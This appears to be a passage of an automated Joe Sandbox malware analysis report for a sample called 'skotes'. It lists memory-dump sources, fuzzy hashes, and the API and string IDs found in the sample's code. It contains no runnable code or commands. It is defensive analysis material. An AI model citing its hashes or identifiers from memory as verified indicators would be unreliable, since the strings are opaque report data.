                                                        • Opcode Fuzzy Hash: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
                                                        • Instruction Fuzzy Hash: 17F14E71E002599FDF14CFA9C8846ADB7B5FF88324F25826ED919AB344D731AE01DB90
                                                        APIs
                                                        • GetSystemTimePreciseAsFileTime.KERNEL32(?,00FBCF52,?,?,?,?,00FBCF87,?,?,?,?,?,?,00FBC4FD,?,00000001), ref: 00FBCC03
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2895241974.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FA0000, based on PE: true
                                                        • Associated: 00000006.00000002.2895209071.0000000000FA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895241974.0000000001002000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895341143.0000000001009000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000100B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000126B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000129C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895781747.00000000012B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895962301.000000000144C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895991964.000000000144E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_fa0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Time$FilePreciseSystem
                                                        • String ID:
                                                        • API String ID: 1802150274-0
                                                        • Opcode ID: c8976a747ad10706cd8106fa9c48f5d9885c59e823dfe1da2f532ded9a2bf8d9
                                                        • Instruction ID: 9e6681b4e9be932e6e7ddf10ed171f02fb1f9ff3be1d0ee887d82c3c9dcc7bd2
                                                        • Opcode Fuzzy Hash: c8976a747ad10706cd8106fa9c48f5d9885c59e823dfe1da2f532ded9a2bf8d9
                                                        • Instruction Fuzzy Hash: 55D02232A4217CE78A122B85EC088FEBF4CAE01B203011111ED0C93160CF116C00FFE1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2895241974.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FA0000, based on PE: true
                                                        • Associated: 00000006.00000002.2895209071.0000000000FA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895241974.0000000001002000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895341143.0000000001009000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000100B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000126B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000129C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895781747.00000000012B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895962301.000000000144C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895991964.000000000144E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_fa0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0
                                                        • API String ID: 0-4108050209
                                                        • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                        • Instruction ID: 2fbffd182a2f938c4b341f86c9aec10c60f4e766db9022b2c6a28e3e5aa8dfea
                                                        • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                        • Instruction Fuzzy Hash: 71517D71A087445ADB3867288C997BEB79B9F013A0F1C051BE442DF381EE569D4FB2D2
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2895241974.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FA0000, based on PE: true
                                                        • Associated: 00000006.00000002.2895209071.0000000000FA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895241974.0000000001002000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895341143.0000000001009000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000100B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000126B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000129C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895781747.00000000012B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895962301.000000000144C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895991964.000000000144E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_fa0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b2bab102aacdb26702b8110ec31425a7a1addc4d677c7f0943f512aca4db2d26
                                                        • Instruction ID: 758bcc2b912919d66b3298859c4e64995207ec64c9a6705b13a2a8b0e6fb1d97
                                                        • Opcode Fuzzy Hash: b2bab102aacdb26702b8110ec31425a7a1addc4d677c7f0943f512aca4db2d26
                                                        • Instruction Fuzzy Hash: 582260B3F515144BDB0CCA9DDCA27ECB2E3BFD8218B0E903DA40AE3345EA79D9158644
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2895241974.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FA0000, based on PE: true
                                                        • Associated: 00000006.00000002.2895209071.0000000000FA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895241974.0000000001002000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895341143.0000000001009000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000100B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000126B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000129C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895781747.00000000012B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895962301.000000000144C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895991964.000000000144E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_fa0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4afd8781a648b6a5fda2bf30c24b8c1b86ed3809f557a68be6eae089992798c3
                                                        • Instruction ID: 859db64edd71585b88db8a4d68714b2093d52b50d65048d620129ea30d72ba20
                                                        • Opcode Fuzzy Hash: 4afd8781a648b6a5fda2bf30c24b8c1b86ed3809f557a68be6eae089992798c3
                                                        • Instruction Fuzzy Hash: C7B16B32614744CFDB28DF29C886B657BA0FF45364F258658E99ACF2A1C335E982DF40
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2895241974.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FA0000, based on PE: true
                                                        • Associated: 00000006.00000002.2895209071.0000000000FA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895241974.0000000001002000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895341143.0000000001009000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000100B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000126B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000129C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895781747.00000000012B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895962301.000000000144C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895991964.000000000144E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_fa0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ea5b876b18ed433da8e813003e8a46e8740f69ef37a39bab34ff90479cf760e0
                                                        • Instruction ID: 8e610f04b3b503157a5dfdf31322e9f78cb2e908564d3a0f21cc169ecd90229a
                                                        • Opcode Fuzzy Hash: ea5b876b18ed433da8e813003e8a46e8740f69ef37a39bab34ff90479cf760e0
                                                        • Instruction Fuzzy Hash: C48134B4E002458FDB15CF68D8847EEBBF2FB9A310F14026AD854A7742C3B5A945DBA0
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2895241974.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FA0000, based on PE: true
                                                        • Associated: 00000006.00000002.2895209071.0000000000FA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895241974.0000000001002000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895341143.0000000001009000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000100B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000126B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000129C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895781747.00000000012B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895962301.000000000144C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895991964.000000000144E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_fa0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 35adec967f1b68a4639316fa74d1812190688ea6ba00710e628e4363e65ab3e0
                                                        • Instruction ID: 1c79c45f4bbb6772228db00742da402ec1ca10fa1749c346c783c7ff670e16ec
                                                        • Opcode Fuzzy Hash: 35adec967f1b68a4639316fa74d1812190688ea6ba00710e628e4363e65ab3e0
                                                        • Instruction Fuzzy Hash: BB21B373F205394B7B0CC47E8C522BDB6E1C78C641745823AE8A6EA2C1D96CD917E2E4
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2895241974.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FA0000, based on PE: true
                                                        • Associated: 00000006.00000002.2895209071.0000000000FA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895241974.0000000001002000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895341143.0000000001009000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000100B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000126B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000129C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895781747.00000000012B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895962301.000000000144C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895991964.000000000144E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_fa0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c436a0e9e20d444e187ecdbd4c2136b26a6d4ae4d374168a8fedfa2cd0f3cfc9
                                                        • Instruction ID: 415fe0c78bb0bcf3b06ad6593022f71829be2fbd3cf26205f78c146433e2d14b
                                                        • Opcode Fuzzy Hash: c436a0e9e20d444e187ecdbd4c2136b26a6d4ae4d374168a8fedfa2cd0f3cfc9
                                                        • Instruction Fuzzy Hash: 6511A323F30C255A775C816D8C172BAA5D2EBD824071F433AD826E7284E9A4DE23D290
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2895241974.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FA0000, based on PE: true
                                                        • Associated: 00000006.00000002.2895209071.0000000000FA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895241974.0000000001002000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895341143.0000000001009000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000100B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000126B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000129C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895781747.00000000012B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895962301.000000000144C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895991964.000000000144E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_fa0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                        • Instruction ID: 735ee83a025fabefcb75cfee236e1f712921a805bbe7a3e4b77ee609ee4c136b
                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                        • Instruction Fuzzy Hash: 23115E7BE011C143E604AA2FC8B46B7A395EBC53717AC4376C8494B754DA22D743B500
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2895241974.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FA0000, based on PE: true
                                                        • Associated: 00000006.00000002.2895209071.0000000000FA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895241974.0000000001002000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895341143.0000000001009000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000100B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000126B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000129C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895781747.00000000012B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895962301.000000000144C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895991964.000000000144E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_fa0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4e27f5f961e50a9f9edb43c702195d1d31db35c4ff45d2048cd1b4b8f8c57da6
                                                        • Instruction ID: 6ac03095f2f0e62447a561e929ff814faeb75f89bd3350498fd87f37d4378d9f
                                                        • Opcode Fuzzy Hash: 4e27f5f961e50a9f9edb43c702195d1d31db35c4ff45d2048cd1b4b8f8c57da6
                                                        • Instruction Fuzzy Hash: F8E08C30141208AACF267F58DC0EE483B6BFB91751F4C1811F9088A375CB2ADED2E680
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2895241974.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FA0000, based on PE: true
                                                        • Associated: 00000006.00000002.2895209071.0000000000FA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895241974.0000000001002000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895341143.0000000001009000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000100B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000126B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000129C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895781747.00000000012B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895962301.000000000144C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895991964.000000000144E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_fa0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                        • Instruction ID: 5e848596cb5478f0ada334cd8a5f19d64c87698314699ca8656bc8c9d2275ce9
                                                        • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                        • Instruction Fuzzy Hash: 35E08C32921228EBCB15DF98C90498AF3EEEB49B10B690097F501D3250C274DE00D7D4
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2895241974.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FA0000, based on PE: true
                                                        • Associated: 00000006.00000002.2895209071.0000000000FA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895241974.0000000001002000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895341143.0000000001009000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000100B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000126B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000129C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895781747.00000000012B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895962301.000000000144C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895991964.000000000144E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_fa0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                        • String ID:
                                                        • API String ID: 57040152-0
                                                        • Opcode ID: c67ffdf61a016087883c5f1b34166193e0fbbd4ec81a5bc13014c92a036d8e50
                                                        • Instruction ID: ee0ceda14508eb10ca45b97e79cef2c9387bc854fb85fdfe4d3861afb2c5bcf5
                                                        • Opcode Fuzzy Hash: c67ffdf61a016087883c5f1b34166193e0fbbd4ec81a5bc13014c92a036d8e50
                                                        • Instruction Fuzzy Hash: 14A1C0B1E012059FEB20DF65CC45B9AB7A8FF16324F148129F815D7241EB39EA04EBD1
                                                        APIs
                                                        • _ValidateLocalCookies.LIBCMT ref: 00FD4877
                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00FD487F
                                                        • _ValidateLocalCookies.LIBCMT ref: 00FD4908
                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00FD4933
                                                        • _ValidateLocalCookies.LIBCMT ref: 00FD4988
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2895241974.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FA0000, based on PE: true
                                                        • Associated: 00000006.00000002.2895209071.0000000000FA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895241974.0000000001002000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895341143.0000000001009000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000100B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000126B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000129C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895781747.00000000012B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895962301.000000000144C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895991964.000000000144E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_fa0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                        • String ID: csm
                                                        • API String ID: 1170836740-1018135373
                                                        • Opcode ID: 1f7b1939c1fd34561adcb58d8339d93e70f44adf03184011d9699f97e6482bfa
                                                        • Instruction ID: 40c3ff33577fc745136335046210463106919878af02bcd22e70cb122ee63f97
                                                        • Opcode Fuzzy Hash: 1f7b1939c1fd34561adcb58d8339d93e70f44adf03184011d9699f97e6482bfa
                                                        • Instruction Fuzzy Hash: 2551F831E002489BCF10DF69CC95AAF7BB7AF45324F1C8056E8189B352D736E915EB92
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2895241974.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FA0000, based on PE: true
                                                        • Associated: 00000006.00000002.2895209071.0000000000FA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895241974.0000000001002000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895341143.0000000001009000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000100B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000126B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000129C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895781747.00000000012B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895962301.000000000144C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895991964.000000000144E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_fa0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _strrchr
                                                        • String ID:
                                                        • API String ID: 3213747228-0
                                                        • Opcode ID: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                        • Instruction ID: 3c2e1068967a2237eb3ef251b1237f28060393cae65156f4dba69e8bfd19c0e5
                                                        • Opcode Fuzzy Hash: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                        • Instruction Fuzzy Hash: 16B12372D042869FDB11CF68C8817AEBBE7EF45350F18416BE955EB341D6398D02EBA0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2895241974.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FA0000, based on PE: true
                                                        • Associated: 00000006.00000002.2895209071.0000000000FA0000.00000004.00000001.01000000.00000007.sdmpDownload File
